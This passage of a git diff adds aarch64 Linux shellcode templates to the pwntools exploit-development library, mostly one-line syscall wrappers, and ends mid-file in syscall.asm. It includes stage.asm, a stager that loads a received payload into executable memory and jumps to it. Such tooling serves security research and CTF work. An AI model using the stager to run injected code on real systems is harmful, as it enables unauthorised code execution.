/dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_max.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_max. See 'man 2 sched_get_priority_max' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_max', algorithm)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_min.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_min.asm new file mode 100644 index 000000000..718fae5bc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_min.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="algorithm"/> +<%docstring> +Invokes the syscall sched_get_priority_min. See 'man 2 sched_get_priority_min' for more information. + +Arguments: + algorithm(int): algorithm + + + ${syscall('SYS_sched_get_priority_min', algorithm)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_getaffinity.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_getaffinity.asm new file mode 100644 index 000000000..4e44be153 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_getaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_getaffinity. See 'man 2 sched_getaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_getaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_getparam.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_getparam.asm new file mode 100644 index 000000000..4f9591fa1 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_getparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_getparam. See 'man 2 sched_getparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_getparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_getscheduler.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_getscheduler.asm new file mode 100644 index 000000000..3799626af --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_getscheduler.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid"/> +<%docstring> +Invokes the syscall sched_getscheduler. See 'man 2 sched_getscheduler' for more information. + +Arguments: + pid(pid_t): pid + + + ${syscall('SYS_sched_getscheduler', pid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_rr_get_interval.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_rr_get_interval.asm new file mode 100644 index 000000000..86dcba489 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_rr_get_interval.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, t"/> +<%docstring> +Invokes the syscall sched_rr_get_interval. See 'man 2 sched_rr_get_interval' for more information. + +Arguments: + pid(pid_t): pid + t(timespec): t + + + ${syscall('SYS_sched_rr_get_interval', pid, t)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_setaffinity.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_setaffinity.asm new file mode 100644 index 000000000..9cb011c50 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_setaffinity.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, cpusetsize, cpuset"/> +<%docstring> +Invokes the syscall sched_setaffinity. See 'man 2 sched_setaffinity' for more information. + +Arguments: + pid(pid_t): pid + cpusetsize(size_t): cpusetsize + cpuset(cpu_set_t): cpuset + + + ${syscall('SYS_sched_setaffinity', pid, cpusetsize, cpuset)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_setparam.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_setparam.asm new file mode 100644 index 000000000..903a90822 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_setparam.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, param"/> +<%docstring> +Invokes the syscall sched_setparam. See 'man 2 sched_setparam' for more information. + +Arguments: + pid(pid_t): pid + param(sched_param): param + + + ${syscall('SYS_sched_setparam', pid, param)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_setscheduler.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_setscheduler.asm new file mode 100644 index 000000000..5b1075cb1 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_setscheduler.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, policy, param"/> +<%docstring> +Invokes the syscall sched_setscheduler. See 'man 2 sched_setscheduler' for more information. + +Arguments: + pid(pid_t): pid + policy(int): policy + param(sched_param): param + + + ${syscall('SYS_sched_setscheduler', pid, policy, param)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_yield.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_yield.asm new file mode 100644 index 000000000..1387fe0a1 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sched_yield.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sched_yield. See 'man 2 sched_yield' for more information. + +Arguments: + + + + ${syscall('SYS_sched_yield')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/select.asm b/pwnlib/shellcraft/templates/aarch64/linux/select.asm new file mode 100644 index 000000000..30d3e0159 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/select.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="nfds, readfds, writefds, exceptfds, timeout"/> +<%docstring> +Invokes the syscall select. See 'man 2 select' for more information. + +Arguments: + nfds(int): nfds + readfds(fd_set): readfds + writefds(fd_set): writefds + exceptfds(fd_set): exceptfds + timeout(timeval): timeout + + + ${syscall('SYS_select', nfds, readfds, writefds, exceptfds, timeout)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sendfile.asm b/pwnlib/shellcraft/templates/aarch64/linux/sendfile.asm new file mode 100644 index 000000000..13a3af4bd --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sendfile.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile. See 'man 2 sendfile' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sendfile64.asm b/pwnlib/shellcraft/templates/aarch64/linux/sendfile64.asm new file mode 100644 index 000000000..3ecc7d5db --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sendfile64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile64. See 'man 2 sendfile64' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile64', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setdomainname.asm b/pwnlib/shellcraft/templates/aarch64/linux/setdomainname.asm new file mode 100644 index 000000000..dbde769ab --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setdomainname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall setdomainname. See 'man 2 setdomainname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_setdomainname', name, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setgid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setgid.asm new file mode 100644 index 000000000..2da0fd529 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="gid"/> +<%docstring> +Invokes the syscall setgid. See 'man 2 setgid' for more information. + +Arguments: + gid(gid_t): gid + + + ${syscall('SYS_setgid', gid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setgroups.asm b/pwnlib/shellcraft/templates/aarch64/linux/setgroups.asm new file mode 100644 index 000000000..346434514 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="n, groups"/> +<%docstring> +Invokes the syscall setgroups. See 'man 2 setgroups' for more information. + +Arguments: + n(size_t): n + groups(gid_t): groups + + + ${syscall('SYS_setgroups', n, groups)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sethostname.asm b/pwnlib/shellcraft/templates/aarch64/linux/sethostname.asm new file mode 100644 index 000000000..d14f1efdb --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sethostname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall sethostname. See 'man 2 sethostname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_sethostname', name, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setitimer.asm b/pwnlib/shellcraft/templates/aarch64/linux/setitimer.asm new file mode 100644 index 000000000..56737099a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setitimer.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="which, new, old"/> +<%docstring> +Invokes the syscall setitimer. See 'man 2 setitimer' for more information. + +Arguments: + which(itimer_which_t): which + new(itimerval): new + old(itimerval): old + + + ${syscall('SYS_setitimer', which, new, old)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setpgid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setpgid.asm new file mode 100644 index 000000000..5715115cc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setpgid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, pgid"/> +<%docstring> +Invokes the syscall setpgid. See 'man 2 setpgid' for more information. + +Arguments: + pid(pid_t): pid + pgid(pid_t): pgid + + + ${syscall('SYS_setpgid', pid, pgid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setpriority.asm b/pwnlib/shellcraft/templates/aarch64/linux/setpriority.asm new file mode 100644 index 000000000..200f81b44 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setpriority.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="which, who, prio"/> +<%docstring> +Invokes the syscall setpriority. See 'man 2 setpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + prio(int): prio + + + ${syscall('SYS_setpriority', which, who, prio)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setregid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setregid.asm new file mode 100644 index 000000000..a5dcc5e10 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setregid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="rgid, egid"/> +<%docstring> +Invokes the syscall setregid. See 'man 2 setregid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + + + ${syscall('SYS_setregid', rgid, egid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setresgid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setresgid.asm new file mode 100644 index 000000000..f4e893ddc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall setresgid. See 'man 2 setresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_setresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setresuid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setresuid.asm new file mode 100644 index 000000000..1d2dde056 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall setresuid. See 'man 2 setresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_setresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setreuid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setreuid.asm new file mode 100644 index 000000000..f23cdfc1b --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setreuid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="ruid, euid"/> +<%docstring> +Invokes the syscall setreuid. See 'man 2 setreuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + + + ${syscall('SYS_setreuid', ruid, euid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setrlimit.asm b/pwnlib/shellcraft/templates/aarch64/linux/setrlimit.asm new file mode 100644 index 000000000..4cf537740 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall setrlimit. See 'man 2 setrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_setrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setsid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setsid.asm new file mode 100644 index 000000000..178a7c20f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall setsid. See 'man 2 setsid' for more information. + +Arguments: + + + + ${syscall('SYS_setsid')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setsockopt.asm b/pwnlib/shellcraft/templates/aarch64/linux/setsockopt.asm new file mode 100644 index 000000000..48e14b1b3 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setsockopt.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="sockfd, level, optname, optval, optlen"/> +<%docstring> +Invokes the syscall setsockopt. See 'man 2 setsockopt' for more information. + +Arguments: + sockfd(int): sockfd + level(int): level + optname(int): optname + optval(void): optval + optlen(int): optlen + + ${syscall('SYS_setsockopt', sockfd, level, optname, optval, optlen)} + diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setsockopt_timeout.asm b/pwnlib/shellcraft/templates/aarch64/linux/setsockopt_timeout.asm new file mode 100644 index 000000000..09f3bcd3f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setsockopt_timeout.asm @@ -0,0 +1,19 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import setsockopt + from pwnlib.shellcraft.aarch64 import mov + from pwnlib.constants import SOL_SOCKET, SO_RCVTIMEO +%> +<%page args="sock, secs"/> +<%docstring> +Invokes the syscall for setsockopt with specified timeout. See 'man 2 setsockopt' for more information. + +Arguments: + sock(int): sock + secs(int): secs + + eor x4, x4, x4 + ${mov('x3', secs)} + stp x3, x4, [sp, #-16]! + ${setsockopt(sock, 'SOL_SOCKET', 'SO_RCVTIMEO', 'sp', 16)} + diff --git a/pwnlib/shellcraft/templates/aarch64/linux/settimeofday.asm b/pwnlib/shellcraft/templates/aarch64/linux/settimeofday.asm new file mode 100644 index 000000000..22ae97d34 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/settimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall settimeofday. See 'man 2 settimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone): tz + + + ${syscall('SYS_settimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/setuid.asm b/pwnlib/shellcraft/templates/aarch64/linux/setuid.asm new file mode 100644 index 000000000..93f224f04 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/setuid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="uid"/> +<%docstring> +Invokes the syscall setuid. See 'man 2 setuid' for more information. + +Arguments: + uid(uid_t): uid + + + ${syscall('SYS_setuid', uid)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sigaction.asm b/pwnlib/shellcraft/templates/aarch64/linux/sigaction.asm new file mode 100644 index 000000000..1eefcf60a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sigaction.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="sig, act, oact"/> +<%docstring> +Invokes the syscall sigaction. See 'man 2 sigaction' for more information. + +Arguments: + sig(int): sig + act(sigaction): act + oact(sigaction): oact + + + ${syscall('SYS_sigaction', sig, act, oact)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sigaltstack.asm b/pwnlib/shellcraft/templates/aarch64/linux/sigaltstack.asm new file mode 100644 index 000000000..65b063fb1 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sigaltstack.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="ss, oss"/> +<%docstring> +Invokes the syscall sigaltstack. See 'man 2 sigaltstack' for more information. + +Arguments: + ss(sigaltstack): ss + oss(sigaltstack): oss + + + ${syscall('SYS_sigaltstack', ss, oss)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/signal.asm b/pwnlib/shellcraft/templates/aarch64/linux/signal.asm new file mode 100644 index 000000000..a392b7dea --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/signal.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="sig, handler"/> +<%docstring> +Invokes the syscall signal. See 'man 2 signal' for more information. + +Arguments: + sig(int): sig + handler(sighandler_t): handler + + + ${syscall('SYS_signal', sig, handler)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sigpending.asm b/pwnlib/shellcraft/templates/aarch64/linux/sigpending.asm new file mode 100644 index 000000000..88600d93d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sigpending.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigpending. See 'man 2 sigpending' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigpending', set)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sigprocmask.asm b/pwnlib/shellcraft/templates/aarch64/linux/sigprocmask.asm new file mode 100644 index 000000000..b6f751e4a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sigprocmask.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="how, set, oset, sigsetsize"/> +<%docstring> +Invokes the syscall sigprocmask. See 'man 2 sigprocmask' for more information. + +Arguments: + how(int): how + set(sigset_t): set + oset(sigset_t): oset + sigsetsize(size_t): sigsetsize + + + ${syscall('SYS_rt_sigprocmask', how, set, oset, sigsetsize)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sigreturn.asm b/pwnlib/shellcraft/templates/aarch64/linux/sigreturn.asm new file mode 100644 index 000000000..4e48522f6 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sigreturn.asm @@ -0,0 +1,10 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="scp"/> +<%docstring> +Invokes the syscall sigreturn. See 'man 2 sigreturn' for more information. + + + ${syscall('SYS_sigreturn')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sigsuspend.asm b/pwnlib/shellcraft/templates/aarch64/linux/sigsuspend.asm new file mode 100644 index 000000000..623b1a342 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sigsuspend.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigsuspend. See 'man 2 sigsuspend' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigsuspend', set)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/socket.asm b/pwnlib/shellcraft/templates/aarch64/linux/socket.asm new file mode 100644 index 000000000..a444de78f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/socket.asm @@ -0,0 +1,16 @@ +<% from pwnlib.shellcraft import aarch64 %> +<% from pwnlib.util.net import sockaddr %> +<% from pwnlib.constants import SOCK_STREAM, SOCK_DGRAM, SYS_socket %> +<%page args="network = 'ipv4', proto = 'tcp'"/> +<%docstring> +Creates a new socket + +<% + sockaddr, length, address_family = sockaddr('127.0.0.1', 1, network) + socktype = { + 'tcp': SOCK_STREAM, + 'udp': SOCK_DGRAM + }.get(proto, proto) +%>\ + /* open new socket */ + ${aarch64.linux.syscall(SYS_socket, address_family, socktype, 0)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/splice.asm b/pwnlib/shellcraft/templates/aarch64/linux/splice.asm new file mode 100644 index 000000000..12d66427f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/splice.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fdin, offin, fdout, offout, len, flags"/> +<%docstring> +Invokes the syscall splice. See 'man 2 splice' for more information. + +Arguments: + fdin(int): fdin + offin(off64_t): offin + fdout(int): fdout + offout(off64_t): offout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_splice', fdin, offin, fdout, offout, len, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/stage.asm b/pwnlib/shellcraft/templates/aarch64/linux/stage.asm new file mode 100644 index 000000000..b80a4f6fe --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/stage.asm @@ -0,0 +1,61 @@ +<% +from pwnlib.shellcraft.aarch64 import mov +from pwnlib.shellcraft.aarch64.linux import read, readn, mmap +from pwnlib import constants as C +%> +<%page args="fd=0, length=None"/> +<%docstring> +Migrates shellcode to a new buffer. + +Arguments: + fd(int): + Integer file descriptor to recv data from. + Default is stdin (0). + length(int): + Optional buffer length. If None, the first pointer-width + of data received is the length. + +Example: + + >>> p = run_assembly(shellcraft.stage()) + >>> sc = asm(shellcraft.echo("Hello\n", constants.STDOUT_FILENO)) + >>> p.pack(len(sc)) + >>> p.send(sc) + >>> p.recvline() + 'Hello\n' + +<% + protection = C.PROT_READ | C.PROT_WRITE | C.PROT_EXEC + flags = C.MAP_ANONYMOUS | C.MAP_PRIVATE + + assert isinstance(fd, int) +%> +%if length is None: + /* How many bytes should we receive? */ + ${read(fd, 'sp', 8)} + ldr x2, [sp] +%else: + ${mov('x2', length)} + str x2, [sp] +%endif + + /* Page-align, assume <4GB */ + lsr x2, x2, #12 + add x2, x2, #1 + lsl x2, x2, #12 + + /* Map it */ + ${mmap(0, 'x2', protection, flags, 0, 0)} + + /* Grab the saved size, save the address */ + ldr x4, [sp] + + /* Save the memory address */ + str x0, [sp] + + /* Read in all of the data */ + ${readn(fd, 'x0', 'x4')} + + /* Go to shellcode */ + ldr x30, [sp] + ret diff --git a/pwnlib/shellcraft/templates/aarch64/linux/stat.asm b/pwnlib/shellcraft/templates/aarch64/linux/stat.asm new file mode 100644 index 000000000..6408c55cd --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/stat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat. See 'man 2 stat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_stat', file, buf)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/stat64.asm b/pwnlib/shellcraft/templates/aarch64/linux/stat64.asm new file mode 100644 index 000000000..5ffef90f2 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/stat64.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat64. See 'man 2 stat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_stat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/stime.asm b/pwnlib/shellcraft/templates/aarch64/linux/stime.asm new file mode 100644 index 000000000..cdf909312 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/stime.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="when"/> +<%docstring> +Invokes the syscall stime. See 'man 2 stime' for more information. + +Arguments: + when(time_t): when + + + ${syscall('SYS_stime', when)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/stty.asm b/pwnlib/shellcraft/templates/aarch64/linux/stty.asm new file mode 100644 index 000000000..5f5c981c0 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/stty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall stty. See 'man 2 stty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_stty', fd, params)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/symlink.asm b/pwnlib/shellcraft/templates/aarch64/linux/symlink.asm new file mode 100644 index 000000000..7073693c8 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/symlink.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall symlink. See 'man 2 symlink' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_symlink', from, to)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/symlinkat.asm b/pwnlib/shellcraft/templates/aarch64/linux/symlinkat.asm new file mode 100644 index 000000000..8feb13956 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/symlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="from, tofd, to"/> +<%docstring> +Invokes the syscall symlinkat. See 'man 2 symlinkat' for more information. + +Arguments: + from(char): from + tofd(int): tofd + to(char): to + + + ${syscall('SYS_symlinkat', from, tofd, to)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sync.asm b/pwnlib/shellcraft/templates/aarch64/linux/sync.asm new file mode 100644 index 000000000..4374eb98a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sync. See 'man 2 sync' for more information. + +Arguments: + + + + ${syscall('SYS_sync')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sync_file_range.asm b/pwnlib/shellcraft/templates/aarch64/linux/sync_file_range.asm new file mode 100644 index 000000000..82756c9cd --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/sync_file_range.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, offset, count, flags"/> +<%docstring> +Invokes the syscall sync_file_range. See 'man 2 sync_file_range' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(off64_t): count + flags(unsigned): flags + + + ${syscall('SYS_sync_file_range', fd, offset, count, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/syscall.asm b/pwnlib/shellcraft/templates/aarch64/linux/syscall.asm new file mode 100644 index 000000000..336bab058 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/syscall.asm @@ -0,0 +1,57 @@ +<% + from pwnlib.shellcraft import aarch64 + from pwnlib.constants import eval + from pwnlib.abi import linux_aarch64_syscall as abi +%> +<%page args="syscall = None, arg0 = None, arg1 = None, arg2 = None, arg3 = None, arg4 = None, arg5 = None, arg6 = None"/> +<%docstring> +Args: [syscall_number, \*args] + Does a syscall + +Any of the arguments can be expressions to be evaluated by :func:`pwnlib.constants.eval`. + +Example: + + >>> print 